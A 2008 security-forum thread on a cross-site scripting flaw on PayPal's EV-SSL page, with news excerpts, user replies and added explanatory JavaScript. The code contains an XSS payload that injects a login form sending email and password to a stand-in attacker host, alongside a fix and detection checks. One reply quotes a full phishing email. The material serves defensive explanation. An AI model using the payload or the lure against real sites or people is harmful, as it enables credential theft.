Spyware, Viruses, & Security forum


'Secure' PayPal page is... you guessed it

by Marianna Schmudlach / May 16, 2008 7:46 AM PDT

Extended SSL no match for the power of XSS
By Dan Goodin in San Francisco

Published Friday 16th May 2008

A serious scripting error has been discovered on PayPal that could enable attackers to create convincing spoof pages that steal users' authentication credentials.

The cross-site scripting bug is made all the more critical because it resides on a page that uses an extended validation secure sockets layer certificate. The new-fangled SSL mechanism is designed to give users a higher degree of confidence that the page they're visiting is secure by turning their browser address bar green.

More: http://www.theregister.co.uk/2008/05/16/paypal_page_succumbs_to_xss/
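The mechanism the article describes, as an added illustration that is not code from The Register, from PayPal, or from the researcher: a reflected parameter written into a page unencoded lets an attacker inject a login form whose action points at a host they control, and because the form is served from the legitimate origin the EV certificate and green address bar still show. The page template, the parameter name, the attacker host and the page origin below are all hypothetical; the payload is constructed for the example.

```javascript
// Added example: a reflected-XSS sink beside its output-encoded fix.
// Template, parameter name, origins and payload are hypothetical.

// Minimal HTML entity encoder for text placed into an HTML element body.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Vulnerable: the "q" parameter is reflected verbatim into the page body.
function renderSearchVulnerable(q) {
  return `<html><body><h1>Results for ${q}</h1></body></html>`;
}

// Fixed: the same template, with the parameter HTML-encoded before insertion.
function renderSearchFixed(q) {
  return `<html><body><h1>Results for ${escapeHtml(q)}</h1></body></html>`;
}

// Constructed payload: closes the heading and inserts a login form whose
// action is an attacker host (hypothetical). Anything typed into it leaves
// the otherwise genuine page for that host.
const PAYLOAD =
  '</h1><form action="https://collector.example/steal" method="post">' +
  'Email <input name="login_email"> ' +
  'Password <input name="login_password" type="password"> ' +
  '<input type="submit" value="Log In"></form><h1>';

// Crude reviewer check: count <form> elements in rendered output whose
// action attribute does not point back at the page's own origin.
function foreignForms(html, pageOrigin) {
  const re = /<form[^>]*action="([^"]+)"/gi;
  let m;
  let count = 0;
  while ((m = re.exec(html)) !== null) {
    if (!m[1].startsWith(pageOrigin)) count++;
  }
  return count;
}

const ORIGIN = 'https://shop.example'; // hypothetical page origin
console.log(foreignForms(renderSearchVulnerable(PAYLOAD), ORIGIN)); // 1
console.log(foreignForms(renderSearchFixed(PAYLOAD), ORIGIN));      // 0
```

The encoded version turns the payload's `<` into `&lt;`, so the browser renders it as text rather than markup and no form appears. The point of the article is that transport security (SSL, extended validation or not) says nothing about this: the injected form is delivered over the site's own valid HTTPS connection.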

I just tried it.
by PudgyOne / May 16, 2008 8:16 AM PDT

It looks safe to me and Mozilla Firefox didn't give me any warnings. I signed in and then back out again.

There have been emails that I just started getting the past few days that claimed they were from PayPal, but I have a way of knowing they weren't real. Wondering if someone clicked on one of those links and got taken to the fake PayPal website.

Fake emails also have fake URLs. If you get this email, do NOT respond. Delete it.


From: service@paypal.com Fake = <support@services.org>

Subject: Notification of Limited Account Access

Dear PayPal Member,

As part of our efforts to provide a safe and secure environment for the online community, we regularly screen account activity. While reviewing your PayPal accounts, we observed activity that we would like to further verify. For this reason, limitations have been placed on your account until your will review your registered intormation. In order to resolve the account limitations, complete our online form by clicking on the following link :

Log into your PayPal account

After we have gathered the necessary information, your account will be reviewed for reinstatement and you will be notified by e-mail of our decision.

We thank you for your prompt attention to this matter and apologize for any inconvenience.

Account Review Department

Unless
by moranacus / May 17, 2008 4:57 AM PDT
In reply to: I just tried it.

Unless the FAKE PAYPAL MESSAGE creators find a way to actually put your name in the emails, then you will always know that they are fake.
Real PAYPAL messages address you by name. FAKE EMAILS don't.

First, they'd have to
by PudgyOne / May 17, 2008 6:26 AM PDT
In reply to: Unless

find out what your full name is.

They are sending the fake emails to an email account that doesn't have a PayPal account. Wonder how I figured out it was fake.

Full Name needed and proper email account. Header was also wrong.
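The two tells the posters above rely on, the From header whose visible name claims paypal.com while the real address is elsewhere, and the generic "Dear PayPal Member" salutation in place of the account holder's name, as an added example that is not from any of the posts. The parsing and the sample message are constructed for the example and modelled on the message quoted above; the recipient name and the expected domain are assumptions.

```javascript
// Added example: two phishing indicators from the thread, checked in code.
// Sample headers, body and recipient name are constructed.

// Parse "Display Name <addr@host>" (or a bare address) into its parts.
function parseFrom(header) {
  const m = header.match(/^\s*(?:"?([^"<]*?)"?\s*)?<([^>]+)>\s*$/);
  if (m) return { display: (m[1] || '').trim(), address: m[2].trim().toLowerCase() };
  return { display: '', address: header.trim().toLowerCase() };
}

function domainOf(address) {
  const at = address.lastIndexOf('@');
  return at < 0 ? '' : address.slice(at + 1).toLowerCase();
}

// Check 1: the visible name claims one domain, the actual address is another
// (the quoted message shows "service@paypal.com" over <support@services.org>).
function fromMismatch(fromHeader, expectedDomain) {
  const { display, address } = parseFrom(fromHeader);
  const claimed = domainOf(display) ||
    (display.toLowerCase().includes(expectedDomain) ? expectedDomain : '');
  return claimed !== '' && claimed !== domainOf(address);
}

// Check 2: the salutation does not contain the registered full name.
function genericGreeting(body, fullName) {
  const line = body.split('\n').map((l) => l.trim()).find((l) => /^dear\b/i.test(l)) || '';
  return line !== '' && !line.toLowerCase().includes(fullName.toLowerCase());
}

function phishIndicators(msg, expectedDomain, fullName) {
  const out = [];
  if (fromMismatch(msg.from, expectedDomain)) out.push('from-domain-mismatch');
  if (genericGreeting(msg.body, fullName)) out.push('generic-greeting');
  return out;
}

// Constructed sample modelled on the message quoted in the thread.
const SAMPLE = {
  from: 'service@paypal.com <support@services.org>',
  subject: 'Notification of Limited Account Access',
  body: 'Dear PayPal Member,\n\nAs part of our efforts ...\n\nAccount Review Department\n',
};

// Constructed counterpart with a consistent sender and a personal salutation.
const LEGIT = {
  from: 'PayPal <service@paypal.com>',
  subject: 'Your receipt',
  body: 'Dear Jane Doe,\n\nThanks for your payment.\n',
};

console.log(phishIndicators(SAMPLE, 'paypal.com', 'Jane Doe')); // both indicators
console.log(phishIndicators(LEGIT, 'paypal.com', 'Jane Doe'));  // []
```

Neither check is proof on its own: a sender can forge the whole From header, and as the posters note, an attacker who learns the victim's full name defeats the greeting check. They are cheap filters, not authentication.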


PayPal flaw raises questions about EV-SSL
by Marianna Schmudlach / May 19, 2008 5:44 AM PDT

19 May 2008

By Matthew Broersma, Techworld.com
eBay's PayPal has acknowledged a serious cross-site scripting (XSS) flaw that could be used to steal user credentials or cookies.

The page affected used an Extended Validation SSL (EV-SSL) certificate, according to Harry Sintonen, the Finnish researcher who discovered the flaw, casting doubt on the claims of EV-SSL to assure users of more secure web pages.
The flaw surfaced just as PayPal was hit by a technical bug that has caused chaos for many e-commerce websites.
Sintonen on Friday demonstrated the use of cross-site scripting on a PayPal web page to prompt users for their login credentials and send the credentials to an unauthorised server, according to several industry reports.

More: http://www.techworld.com/security/news/index.cfm?RSS&NewsID=101535
